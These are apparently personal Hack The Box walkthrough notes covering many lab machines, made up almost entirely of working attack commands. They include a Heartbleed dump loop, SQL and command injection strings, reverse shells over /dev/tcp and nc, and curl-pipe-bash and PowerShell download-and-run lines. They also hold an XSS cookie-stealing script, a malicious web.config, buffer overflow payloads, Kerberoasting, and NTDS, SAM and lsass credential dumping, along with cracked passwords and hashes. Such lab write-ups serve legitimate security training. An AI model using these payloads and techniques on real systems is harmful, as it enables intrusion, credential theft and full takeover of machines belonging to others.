OpenSSL 1.0.1f TLS Heartbeat Extension - 'Heartbleed' Memory Disclosure (Multiple SSL/TLS Versions) https://www.exploit-db.com/exploits/32745
`for i in $(seq 1 10000); do python 32745.py 10.10.10.79 | grep -v '00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00' >> mem-dump.txt; done`
found a repeated base64 string 'aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==' in the mem-dump.txt
decode it got 'heartbleedbelievethehype' which works decrypt the ssh key
`openssl rsa -in hype_key -out hype_key_decrypted`
`ssh -i hype_key_decrypted hype@10.10.10.79`
Privilege_escalation 1(hype->root)
`history` shows a lot of commands about tmux
`tmux -S /.devs/dev_sess` got a root session
if 'open terminal failed: missing or unsuitable terminal: tmux-256color'
`export TERM=xterm`
Privilege_escalation 2(hype->root)
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method) https://www.exploit-db.com/exploits/40839
`gcc -pthread 40839.c -o test -lcrypt`
`su firefart`

Initial_Foothold 1
gobuster dir found /administrative
Manually SQL Injection bypass login with username: admin' -- - password: random (0xdf: admin' or 1=1 limit 1;-- -)
OR `ffuf -X POST -u http://10.10.11.101/administrative -d 'uname=FUZZ&password=0xdf' -w /usr/share/seclists/Fuzzing/SQLi/Generic-SQLi.txt -x http://127.0.0.1:8080 -H "Content-Type: application/x-www-form-urlencoded" --fw 206`
read files by burp manual SQli: uname=admin' union select 1,LOAD_FILE("/etc/passwd"),3,4,5,6-- -&password=admin
"/etc/apache2/sites-enabled/000-default.conf" shows "/var/www/writer.htb/writer.wsgi"
"/var/www/writer.htb/writer.wsgi" shows "from writer import app as application"
"/var/www/writer.htb/writer/__init__.py" shows "mysql.connector.connect(user='admin', password='ToughPasswordToCrack', host='127.0.0.1', database='writer')"
also shows a command injection point "os.system("mv {} {}.jpg".format(local_filename, local_filename))"
`touch 'test.jpg; echo cGluZyAtYyAxIDEwLjEwLjE0LjI2ICAK|base64 -d|bash;'`
and tcpdump got ping, now switch payload as `echo 'bash -c "bash -i >& /dev/tcp/10.10.14.26/9001 0>&1"' | base64`
Initial_Foothold 2
`smbmap -H 10.10.11.101 -u kyle -p ToughPasswordToCrack` found writer2_project has read&write
`smbclient -U kyle //10.10.11.101/writer2_project ToughPasswordToCrack`
OR `mount -t cifs -o 'username=kyle,password=ToughPasswordToCrack' //10.10.11.101/writer2_project /mnt`
`cd writer` `get view.py` inject os.system("curl http://10.10.14.3/bash.sh|bash") into 'def home_page(request):'
`put view.py` and trigger asap with the 'story image from URL' http://127.0.0.1/test.jpg
Privilege_escalation(www-data->kyle)
found "/var/www/writer2_project/manage.py" `python3 manage.py dbshell`
`show databases;use dev;show tables;select * from auth_user;` got kyle's password hash
cracked by hashcat kyle:marcoantonio and `su kyle`
Privilege_escalation(kyle->john)
pspy found root is running `/bin/sh -c /usr/bin/cp /root/.scripts/master.cf /etc/postfix/master.cf` every 2 mins
/etc/postfix/master.cf contains the scripts that are executed on a emails as they arrive.
it has a line "flags=Rq user=john argv=/etc/postfix/disclaimer -f ${sender} -- ${recipient}"
which means user john is gonna run /etc/postfix/disclaimer when email arrive
-rwxrwxr-x 1 root filter 1021 Jul 31 07:06 /etc/postfix/disclaimer
kyle has groups=1000(kyle),997(filter),1002(smbgroup) which means kyle can write /etc/postfix/disclaimer
add payload(echo our_pub_key >> /home/john/.ssh/authorized_keys) into disclaimer and send email asap
`swaks --to root@writer.htb --from test@writer.htb --header "test" --body "test" --server 127.0.0.1`
Privilege_escalation(john->root)
john has groups=1001(john),1003(management)
drwxrwxr-x 2 root management 4096 Jul 28 09:24 /etc/apt/apt.conf.d
pspy found root is running `/usr/bin/apt-get update`
echo 'apt::Update::Pre-Invoke {"PAYLOAD"}' > /etc/apt/apt.conf.d/000-shell

Initial_Foothold
`smbmap -H 10.10.10.100` found 'Replication' share is readable
`smbget -Rr smb://10.10.10.100/Replication` `find . -type f -exec grep -H password {} \; 2>/dev/null`
found gpp password hash in ./active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
`gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ` got cred active.htb\SVC_TGS:GPPstillStandingStrong2k18
`smbclient //10.10.10.100/Users -U active.htb\\SVC_TGS%GPPstillStandingStrong2k18`
smb: \SVC_TGS\desktop\> get user.txt
Privilege_escalation
`bloodhound-python -u SVC_TGS -p GPPstillStandingStrong2k18 -ns 10.10.10.100 -d active.htb -c all --zip`
`python3 /root/impacket/build/scripts-3.10/GetADUsers.py -dc-ip 10.10.10.100 -all active.htb/svc_tgs`
`python3 /root/impacket/build/scripts-3.10/GetUserSPNs.py -dc-ip 10.10.10.100 active.htb/svc_tgs -request`
the hash start with $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$
`python3 /root/impacket/build/scripts-3.10/GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS -save -outputfile GetUserSPNs.out`
`hashcat -m 13100 -a 0 GetUserSPNs.out /usr/share/wordlists/rockyou.txt --force` got cread Administrator:Ticketmaster1968
`smbclient //10.10.10.100/C$ -U active.htb\\administrator%Ticketmaster1968` `get \users\administrator\desktop\root.txt`
`psexec.py active.htb/administrator@10.10.10.100`

Initial_Foothold
https://atsserver.acute.local/about.html bottom show users
page top right "New Starter Forms" download 'New_Starter_Checklist_v7.docx' found default pass: Password1! and link
`exiftool New_Starter_Checklist_v7.docx` shows 'Description: Created on Acute-PC01'
docx found link https://atsserver.acute.local/Acute_Staff_Access which is PowerShell Web Access (PSWA)
login the webPS with edavies:Password1! 'Computer_name':Acute-PC01
get a meterpreter shell for the next step
Privilege_escalation(edavies->imonk)
meterpreter> `keyscan_start` `keyscan_dump` found the edavies user(bot)'s action to get a PS session of imonks user
replicate the edavies user(bot)'s action
PS> $pass = ConvertTo-SEcureString "W3_4R3_th3_f0rce." -AsPlainText -Force
PS> $cred = New-Object System.Management.Automation.PSCredential("ACUTE\imonks", $pass)
PS> Enter-PSSession -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
OR using '-ScriptBlock' instead
PS> Invoke-Command -ComputerName ATSServer -Credential $cred -ConfigurationName dc_manage -ScriptBlock { Get-Command }
PS> Invoke-Command -ComputerName ATSServer -Credential $cred -ConfigurationName dc_manage -ScriptBlock { Get-Alias }
PS> Invoke-Command -ComputerName ATSServer -Credential $cred -ConfigurationName dc_manage -ScriptBlock { cat ..\Desktop\user.txt }
Privilege_escalation(imonk->jmorgan)
PS> Invoke-Command -ComputerName ATSServer -Credential $cred -ConfigurationName dc_manage -ScriptBlock { cat \Users\imonks\desktop\wm.ps1 }
wm.ps1 file has the PS script block to get code excution as acute\jmorgan, many attemp fails, maybe $securepasswd is too long
PS> Invoke-Command -ScriptBlock { ((cat ..\desktop\wm.ps1 -Raw) -replace 'Get-Volume', 'C:\utils\nc64.exe -e cmd 10.10.14.6 443') | sc -Path ..\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
#note: cat = Get-Content, sc = Set-Content
PS> Invoke-Command -ScriptBlock { ..\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
`rlwrap -cAr nc -lnvp 443` and we got the jmorgan shell
Privilege_escalation(jmorgan->awallace)
PS> `net localgroup Administrators` has ACUTE\jmorgan
PS> reg save HKLM\sam sam.bak ; reg save HKLM\system sys.bak
`secretsdump.py -sam sam.bak -system sys.bak LOCAL` got hashes, and crack got Password@123
PS> $pass = ConvertTo-SecureString "Password@123" -AsPlainText -Force
PS> $cred = New-Object System.Management.Automation.PSCredential("ACUTE\awallace", $pass)
PS> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { whoami }
Privilege_escalation(awallace->Site_Admin)
PS> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { cat \program files\keepmeon\keepmeon.bat }
REM This is run every 5 minutes. For Lois use ONLY
@echo off
for /R %%x in (*.bat) do ( if not "%%x" == "%~0" call "%%x" )
"REM" denotes comment. To define a var: use %x in cmd, use %%x in batch scripting, ("x" could be "i","item","file")
In batch scripting, %0 refers to the name of the batch file itself, %~0 refers to the fully qualified path name of the batch file.
the keepmeon.bat is running every other .bat file within the current dir every 5 mins as Lois who "could add people to become “site admin”" in New_Starter_Checklist_v7.docx
PS> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { Set-Content -Path '\program files\keepmeon\0xdf.bat' -Value 'net group site_admin awallace /add /domain'}
PS> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { net group Site_Admin /domain }
PS> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { cat \users\administrator\desktop\root.txt }
OR use msfvenom make payload and upload then got a shell
PS> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { \program files\keepmeon\9001.exe }

Initial_Foothold
`python3 IOXIDResolver.py -t 10.10.10.213` found dead:beef::b885:d62a:d679:573f then nmap scan the ipv6
`cme smb dead:beef::b885:d62a:d679:573f --shares -u '' -p ''` shows 'backup' share has 'READ' access (crackmapexec need version 5.1.6dev above )
`smbclient \\\\dead:beef::b885:d62a:d679:573f\\backup` anonymous login found backup.zip `smbget smb://apt/backup/backup.zip`
zip2john and crack got pass: iloveyousomuch unzip got ntds.dit and SYSTEM
`secretsdump.py -system registry/SYSTEM -ntds Active\ Directory/ntds.dit LOCAL > backup_ad_dump`
`wc -l backup_ad_dump` 8005 lines `grep ':::' backup_ad_dump | awk -F: '{print $1}' > users` and `wc -l users` 2000 lines
`kerbrute_linux_amd64 userenum -d htb.local --dc apt.htb users` found 'Administrator@htb.local' 'APT$@htb.local' 'henry.vinson@htb.local'
`cat backup_ad_dump| grep henry.vinson` henry.vinson:3647:aad3b435b51404eeaad3b435b51404ee:2de80758521541d19cabba480b260e8f:::
Failed: `crackmapexec smb htb.local -u henry.vinson -H hashes` STATUS_LOGON_FAILURE
`reg.py -hashes :e53d87d42adaa3ca32bdb34a876cbffb htb.local/henry.vinson@apt.htb query -keyName HKU` got sub dir like 'Software' and 'Network' ...
`reg.py -hashes :e53d87d42adaa3ca32bdb34a876cbffb htb.local/henry.vinson@apt.htb query -keyName HKU\\Software\\GiganticHostingManagementSystem` found cred henry.vinson_adm:G1#Ny5@2dvht
`evil-winrm -i apt.htb -u henry.vinson_adm -p G1#Ny5@2dvht`
Privilege_escalation(henry->admin)
*Evil-WinRM* PS> Bypass-4MSI
*Evil-WinRM* PS> Invoke-Binary /root/tool/winPEASany_ofs.exe
C:\Users\henry.vinson_adm\AppData\Roaming\microsoft\windows\powershell\PSREadline\ConsoleHost_history.txt has a line mention "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" lmcompatibilitylevel -Type DWORD -Value 2 -Force
*Evil-WinRM* PS> Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" lmcompatibilitylevel
which found "lmcompatibilitylevel : 2"
According to https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-lan-manager-authentication-level
"2" means Send NTLM response only, Client devices use NTLMv1 authentication, and they use NTLMv2 session security if the server supports it. Domain controllers accept LM, NTLM, and NTLMv2 authentication.
triger auth to kali by invoke defender scan on smb file to responder
edit 'Challenge = 1122334455667788' '/etc/responder/Responder.conf' and start `responder -I tun0 --lm`
*Evil-WinRM* PS C:\Program Files\windows defender> .\MpCmdRun.exe -Scan -ScanType 3 -File \\10.10.14.9\share\file.txt
note: -ScanType 1:quick scan, 2:full scan, 3:specify file
OR Collect Net-NTLMv1 hash Via RPC / RoguePotato [ippsec_video][0xdf_post]
`python3 ~/tool/ntlmv1-multi-master/ntlmv1.py --ntlmv1 APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788`
script output: "To Crack with crack.sh use the following token NTHASH:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384"
everybody's walkthrough using https://crack.sh/get-cracking/ to crack, and receive email within 1 min. but now that site/page showing "down for maintenance"
which is why I never actually cracked the NTLMv1 Hash, have to copy from others: d167c3238864b12f5f82feae86a7f798
`secretsdump.py -hashes :d167c3238864b12f5f82feae86a7f798 'htb.local/APT$@htb.local'` got administrator NTLM
`evil-winrm -u administrator -H c370bddf384a691d811ff3495e8a72e2 -i apt.htb`

Initial_Foothold 1
found tcp/8500 running 'ColdFusion 8' `searchsploit ColdFusion`
Adobe ColdFusion 8 - Remote Command Execution (RCE) https://www.exploit-db.com/exploits/50057
Initial_Foothold 2
http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
found password hash 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03 crack: happyday
and based on login page source code, it need a salted sha1 hash, and the salt is hidden in source code. Use browser dev tool to calculate the sha1 hash
hex_hmac_sha1(document.loginform.salt.value, '2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03');
use burp to edit 'cfadminPassword=' value with the sha1 hash got logged in
https://nets.ec/Coldfusion_hacking#Writing_Shell_to_File
go to 'Mappings' section upload a payload and set schedule to run it
Privilege_escalation(tolis->system)
`systeminfo` and save in kali as 'systeminfo'
`./windows-exploit-suggester.py --update` got 2023-08-07-mssb.xls
`./windows-exploit-suggester.py -i systeminfo -d 2023-08-07-mssb.xls` found many
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
https://github.com/egre55/windows-kernel-exploits/blob/master/MS10-059%3A%20Chimichurri/Compiled/Chimichurri.exe
`MS10-059.exe 10.10.14.26 9001`

Initial_Foothold
register and login the E-coin page, submit a transfer shows the admin will review it, which leaks to XSS(Cross Site Scripting)
<img src="10.10.14.5/test.jpg" /> <script src="http://10.10.14.5/test.js"></script> python server only receive test.js
NoteL responder catched hash non-crakable: [SMBv2] NTLMv2-SSP Hash : Cortin::BANKROBBER:8e03eb65c1ff7440:B6A365E18C306FF457C7B2E133E71AC6:0101000000000000C0653150DE09D201A9520A6CF259AB64000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D20106000400020000000800300030000000000000000000000000200000651BA4D76C8F5FB4DB2D21ED382782CB4FC0762AE6F5272B06ED51D958033E6C0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E003500000000000000000000000000
create the test.js var request = new XMLHttpRequest();request.open('GET', 'http://10.10.14.5/?test='+document.cookie, true);request.send()
10.10.10.154 - - [13/Aug/2023 02:13:32] "GET /?cookies=dXNlcm5hbWU9WVdSdGFXNCUzRDsgcGFzc3dvcmQ9U0c5d1pXeGxjM055YjIxaGJuUnBZdyUzRCUzRDsgaWQ9MQ== HTTP/1.1" 200 -
`echo -n dXNlcm5hbWU9WVdSdGFXNCUzRDsgcGFzc3dvcmQ9U0c5d1pXeGxjM055YjIxaGJuUnBZdyUzRCUzRDsgaWQ9MQ== | base64 -d` output: username=YWRtaW4%3D; password=SG9wZWxlc3Nyb21hbnRpYw%3D%3D; id=1
`echo -n YWRtaW4= | base64 -d` admin `echo -n SG9wZWxlc3Nyb21hbnRpYw== | base64 -d` Hopelessromantic and login with admin:Hopelessromantic
SQL Injection in 'search users'
10' UNION SELECT user,password,3 from mysql.user;-- -
10' UNION SELECT 1,load_file('c:\\xampp\\htdocs\\admin\\backdoorchecker.php'),3;-- -
$bad = array('$(','&'); $good = "ls"; which means we can use ';' or '|' to bypass filter
if($_SERVER['REMOTE_ADDR'] == "::1"){ which means it only run on local
XSRF(Cross Site Request Forgery)
hosting payload shell.js : var request = new XMLHttpRequest(); var params = 'cmd=dir|powershell -c "iwr -uri 10.10.14.5/nc64.exe -outfile %temp%\\n.exe"; %temp%\\n.exe -e cmd.exe 10.10.14.5 443'; request.open('POST', 'http://localhost/admin/backdoorchecker.php', true); request.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); request.send(params);
submit to trigger request to kali: <script src="http://10.10.14.5/shell.js"></script>
then shell.js will cause itself POST local backdoorchecker.php with 'cmd=dir|payload'
due to the request is indeed comming from itself, which means ($_SERVER['REMOTE_ADDR'] == "::1") is true
thus excuting the payload
Privilege_escalation(cortin–>system)
found C:\bankv2.exe and `icacls bankv2.exe` output 'Toegang geweigerd' which is 'Access denied' in Dutch
`netstat -anop TCP` found PID:1564 running on TCP 0.0.0.0:910
`tasklist /FI "PID eq 1564" found it is bankv2.exe
enum a little using nc.exe and setup port forwarding
kali# chisel_1.7.6_linux_amd64 server -p 8000 --reverse
target> chisel.exe client 10.10.14.5:8000 R:910:127.0.0.1:910
the '4 digit PIN code to login' accept 0021
then the 'amount of e-coins' is the BoF input position
`msf-pattern_create -l 100` fill the 'amount' got '[$] Executing e-coin transfer tool: 0Ab1...'
`msf-pattern_offset -q 0Ab1` offsec is 32
test with AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCCCCCCCCCCCCCCCCC got '[$] Executing e-coin transfer tool: BBBBCCCCCCCCCCCCCCCCCCCC'
payload: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\users\public\nc -e cmd.exe 10.10.14.5 9002

Initial_Foothold
Drupal 7.x Services Module Remote Code Execution https://www.exploit-db.com/exploits/41564
gobuster dir found '/rest'
edit: $url = 'http://10.10.10.9'; $endpoint_path = '/rest'; 'filename' => 'shell.php', 'data' => ''
`php 41564.php` File written: http://10.10.10.9/shell.php
`curl http://10.10.10.9/shell.php --data-urlencode "cmd=\\\\10.10.14.26\\share\\nc.exe -e cmd 10.10.14.26 9001"`
OR 44449.rb edit with `dos2unix 44449.rb` and use burp to turn 'POST to CHANGELOG.txt' into 'GET to CHANGELOG.txt' and let go others
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution https://www.exploit-db.com/exploits/44449
OR 44542.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC) https://www.exploit-db.com/exploits/44542
Privilege_escalation(iusr->system)
0xdf run `\\10.10.14.14\share\Watson.exe` on target found MS11-046
making watson.exe
Get target .NET Versions: `reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"` OR `c:\Windows\Microsoft.NET\Framework>dir /A:D` '/A:D means list all dir'
Get target arch: `systeminfo`
Compile Watson using Visual Studio: open Watson.sln->Project->Watson_Properties(Application) change 'Target framework' to the lastest version on target, Watson_Properties(Build) change cpu arch
Note: Watson Supported Versions till Windows 10 1507, 1511, 1607, 1703, 1709, 1803, 1809, 1903, 1909, 2004 Windows Server 2016 & 2019
ippsec search 'windows server 2008' and use MS15-051
`ms15-051.exe "nc.exe -e cmd.exe 10.10.14.26 9002"`

Initial_Foothold
`smbmap -H 10.10.10.134 -u anonymous` found 'backups' share has read&write
found WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
install tool pack of guestmount(a tool for mounting virtual hard disk files on Linux) `apt install libguestfs-tools`
Failed: `guestmount --add ./smbmnt/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro ./smbmnt2/` 'no operating system was found on this disk'
It better run it on pwnbox(hackthebox internal network dedicated virtual machine)
`guestmount --add ./mnt/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro ./mnt2/` I did this on pwnbox
found SAM,SECURITY,SYSTEM in /mnt2/Windows/System32/config/
`secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL` got hashes, crack with crackstation.net
cred: L4mpje:bureaulampje administrator:thXLHM96BeKL0ER2
SSH with L4mpje:bureaulampje
Privilege_escalation
found PS C:\Program Files (x86)\mRemoteNG (remote connection management tool)
found password hash in C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml
https://github.com/kmahyyg/mremoteng-decrypt
`python3 mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==` Password: thXLHM96BeKL0ER2
`ssh administrator@10.10.10.134` thXLHM96BeKL0ER2

Initial_Foothold
`smbmap -H 10.10.10.192 -u anonymous -R` found lots of names in 'profiles$' share, edit them as smbprofiles_users.txt
`./GetNPUsers.py 'BLACKFIELD.local/' -usersfile ./smbprofiles_users.txt -format hashcat -outputfile hashes.asreproast -dc-ip 10.10.10.192` only svc_backup and support output differently
`hashcat hashes.asreproast --wordlist /usr/share/wordlists/rockyou.txt` got support:#00^BlackKnight
Failed: `crackmapexec winrm 10.10.10.192 -u support -p '#00^BlackKnight'`
Failed: `ldapsearch -h 10.10.10.192 -D cn=support,dc=blackfield,dc=local -w '#00^BlackKnight' -x -b 'dc=blackfield,dc=local'`
`crackmapexec smb 10.10.10.192 -u support -p '#00^BlackKnight'` `smbmap -H 10.10.10.192 -u support -p '#00^BlackKnight'` can READ: IPC$ NETLOGON profiles$ SYSVOL
`bloodhound-python -c ALL -u support -p '#00^BlackKnight' -d blackfield.local -dc dc01.blackfield.local -ns 10.10.10.192 --zip`
bloodhound GUI search 'support', the user has 1 'First Degree Object Control' which is 'ForceChangePassword' on user 'AUDIT2020'
Linux example: `net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"` [if Password has ! it need to be \!]
0xdf use: `rpcclient -U 'blackfield.local/support%#00^BlackKnight' 10.10.10.192 -c 'setuserinfo2 audit2020 23 "0xdf!!!"'`
Note: '23' is from https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-samr/6b0dff90-5ac0-429a-93aa-150334adabf6?redirectedfrom=MSDN
Failed: `crackmapexec winrm 10.10.10.192 -u audit2020 -p '0xdf!!!'`
`crackmapexec smb 10.10.10.192 -u audit2020 -p '0xdf!!!'` `smbmap -H 10.10.10.192 -u audit2020 -p '0xdf!!!'` can READ: IPC$ NETLOGON profiles$ SYSVOL forensic
found .\forensic\memory_analysis\lsass.zip `unzip lsass.zip` got lsass.DMP lsass.zip
`pip3 install pypykatz` `pypykatz lsa minidump lsass.DMP` got svc_backup:9658d1d1dcd9250115e2205d9f48400d (NT hash)
`crackmapexec winrm 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d` works
`evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d`
Note: about lsass.dmp
Mimikatz can dump creds and hashes from lsass.exe. Anti-virus ban that, but attackers can use procdump.exe(Sysinternals signed by Microsoft) to dump lsass.exe
then transfer dump and run mimikatz OR pypykatz on attacker's machine.
`procdump.exe -accepteula -ma lsass.exe lsass.dmp`
// or avoid reading lsass by dumping a cloned lsass process
`procdump.exe -accepteula -r -ma lsass.exe lsass.dmp`
Privilege_escalation(svc_backup->administrator)
`whoami /all` shows 'SeBackupPrivilege Back up files and directories Enabled' which means 'basically allows for full system read' corrding to 0xdf
https://github.com/giuliano108/SeBackupPrivilege
root@kali# unix2dos cmd
transfer to target
*Evil-WinRM* PS C:\programdata> type cmd
set context persistent nowriters
add volume c: alias temp
create
expose %temp% h:
exit
*Evil-WinRM* PS C:\programdata> diskshadow /s cmd
*Evil-WinRM* PS C:\programdata> upload SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\programdata> upload SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\programdata> import-module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\programdata> import-module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\programdata> Copy-FileSeBackupPrivilege h:\windows\ntds\ntds.dit c:\windows\temp\NTDS -Overwrite
*Evil-WinRM* PS C:\programdata> Copy-FileSeBackupPrivilege h:\windows\system32\config\SYSTEM c:\windows\temp\SYSTEM -Overwrite
*Evil-WinRM* PS C:\windows\temp> download NTDS
*Evil-WinRM* PS C:\windows\temp> download SYSTEM
root@kali# secretsdump.py -system SYSTEM -ntds NTDS LOCAL
root@kali# evil-winrm -i 10.10.10.192 -u Administrator -H 184fb5e5178480be64824d4cd53b99ee

Initial_Foothold(system)
`nmap -p 445 -script vuln 10.10.10.40`
Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) State: VULNERABLE
msf6 > search ms17-010
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.10.14.14
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
meterpreter > shell
Manually method: https://0xdf.gitlab.io/2021/05/11/htb-blue.html#python-script
https://github.com/helviojunior/MS17-010/blob/master/send_and_execute.py
I've not tried this one

Initial_Foothold
gobuster dir found /uploadedfiles /transfer.aspx
Failed: 'edit upload file name in burp cmdasp.aspx%00.jpg' /UploadedFiles/cmdasp.aspx shows error about web.config
https://003random.com/posts/archived/2018/05/22/rce-by-uploading-a-web-config/
I never try 003random's web.config, I used 0xdf's 'VBScript' version which the web.config file ends with:
<%@ Language=VBScript %>
<% call Server.CreateObject("WSCRIPT.SHELL").Run("cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.5/Invoke-PowerShellTcp.ps1')") %>
trigger with http://10.10.10.93/UploadedFiles/web.config
Privilege_escalation(merlin->system)
https://github.com/decoder-it/juicy-potato
`.\jp.exe -t * -p c:\users\public\invoke-ps.ps1 -l 9001`
OR msf exploit(windows/local/ms10_092_schelevator) >
OR msf exploit(windows/local/ms16_014_wmi_recv_notif) >

Initial_Foothold
8080/contact.php show 'Gym Management Software 1.0'
Gym Management System 1.0 - Unauthenticated Remote Code Execution https://www.exploit-db.com/exploits/48506
`python2 48506.py http://10.10.10.198:8080/`
Privilege_escalation(shaun->administrator)
`netstat` and `tasklist` found 'CloudMe.exe' running 'TCP 127.0.0.1:8888'
CloudMe 1.11.2 - Buffer Overflow (PoC) https://www.exploit-db.com/exploits/48389
`msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.26 lport=9002 -b '\x00\x0A\x0D' -f python -v payload`
kali# chisel_1.7.6_linux_amd64 server -p 8000 --reverse
target> chisel.exe client 10.10.14.26:8000 R:8888:127.0.0.1:8888
kali# python3 48389.py

Initial_Foothold
`ldapsearch -H ldap://10.10.10.182 -x -b "DC=cascade,DC=local" '(objectClass=person)' > ldap-people.txt`
found 'cascadeLegacyPwd: clk0bjVldmE=' in ldap-people.txt and base64 -d got cred r.thompson:rY4n5eva which works on smb verified by crackmapexec
`smbmap -H 10.10.10.182 -u r.thompson -p rY4n5eva` `smbclient -U r.thompson%rY4n5eva //10.10.10.182/Data`
I've not tried: smb: \> mask ""; prompt OFF; recurse ON; lcd smb/ ;mget *
I've not tried: mount -t cifs -o 'username=r.thompson,password=rY4n5eva' //10.10.11.182/Data /mnt
found '"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f' in //10.10.10.182/Data/IT/Temp/s.smith/VNC\ Install.reg
google 'vnc install.reg password' found https://github.com/frizb/PasswordDecrypts
`echo -n 6bcf2a4b6e5aca0f | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv` output 'sT333ve2'
`evil-winrm -i 10.10.10.182 -u s.smith -p sT333ve2`
Privilege_escalation(s.smith->arksvc)
//10.10.10.182/Audit$/RunAudit.bat has 'CascAudit.exe "\\CASC-DC1\Audit$\DB\Audit.db"'
on windows VM(I use commando), use dnSpy debug 'CascAudit.exe' with 'Audit.db' as arg
set break-point at line of 'sqliteConnection.Close();' and run, found cred arksvc:w3lc0meFr31nd
`evil-winrm -i 10.10.10.182 -u arksvc -p w3lc0meFr31nd`
Privilege_escalation(arksvc->administrator)
`net user arksvc` found it's in 'CASCADE\AD Recycle Bin' group
`Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects` found 'TempAdmin'
`Get-ADObject -filter { SAMAccountName -eq "TempAdmin" } -includeDeletedObjects -property *` found 'cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz'
`echo YmFDVDNyMWFOMDBkbGVz | base64 -d` got cred TempAdmin:baCT3r1aN00dles
`evil-winrm -i 10.10.10.182 -u administrator -p baCT3r1aN00dles`

Initial_Foothold
Achat 0.150 beta7 - Remote Buffer Overflow https://www.exploit-db.com/exploits/36025
